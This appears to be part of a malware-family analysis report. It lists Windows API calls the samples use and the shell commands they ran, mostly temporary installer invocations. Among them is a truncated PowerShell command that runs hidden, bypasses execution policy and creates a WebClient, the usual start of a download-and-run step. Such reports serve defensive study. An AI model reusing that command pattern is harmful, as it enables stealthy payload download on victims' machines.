ntdll.dll!NtQueryInformationFile ntdll.dll!NtQueryInformationProcess ntdll.dll!NtQueryInformationThread ntdll.dll!NtQueryInformationToken ntdll.dll!NtQueryKey ntdll.dll!NtQueryLicenseValue ntdll.dll!NtQueryPerformanceCounter ntdll.dll!NtQuerySecurityAttributesToken ntdll.dll!NtQuerySecurityObject ntdll.dll!NtQuerySystemInformation ntdll.dll!NtQuerySystemInformationEx ntdll.dll!NtQueryValueKey ntdll.dll!NtQueryVirtualMemory ntdll.dll!NtQueryVolumeInformationFile ntdll.dll!NtQueryWnfStateData ntdll.dll!NtReleaseMutant ntdll.dll!NtReleaseSemaphore ntdll.dll!NtReleaseWorkerFactoryWorker ntdll.dll!NtRequestWaitReplyPort ntdll.dll!NtResumeThread ntdll.dll!NtSetEvent ntdll.dll!NtSetInformationKey ntdll.dll!NtSetInformationProcess ntdll.dll!NtSetInformationThread ntdll.dll!NtSetInformationVirtualMemory ntdll.dll!NtSetInformationWorkerFactory ntdll.dll!NtSetTimer2 ntdll.dll!NtSubscribeWnfStateChange ntdll.dll!NtTestAlert ntdll.dll!NtTraceControl ntdll.dll!NtUnmapViewOfSection ntdll.dll!NtUnmapViewOfSectionEx ntdll.dll!NtWaitForAlertByThreadId ntdll.dll!NtWaitForMultipleObjects ntdll.dll!NtWaitForSingleObject ntdll.dll!NtWaitForWorkViaWorkerFactory ntdll.dll!NtWaitLowEventPair ntdll.dll!NtWorkerFactoryWorkerReady ntdll.dll!NtWriteFile UNKNOWN
Encryption Used	BCryptOpenAlgorithmProvider

Shell Command Execution

i

Shell Command Execution

This section lists Windows shell commands that are run by the samples in this family. Windows Shell commands are often leveraged by malware for nefarious purposes and can be used to elevate security privileges, download and launch other malware, exploit vulnerabilities, collect and exfiltrate data, and hide malicious activity.

"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"

"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"

"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"

"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"

"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"

Show More

powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient

"C:\Users\Czxnhiuo\AppData\Local\Temp\is-L4OPD.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp" /SL5="$40356,931898,131584,c:\users\user\downloads\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661"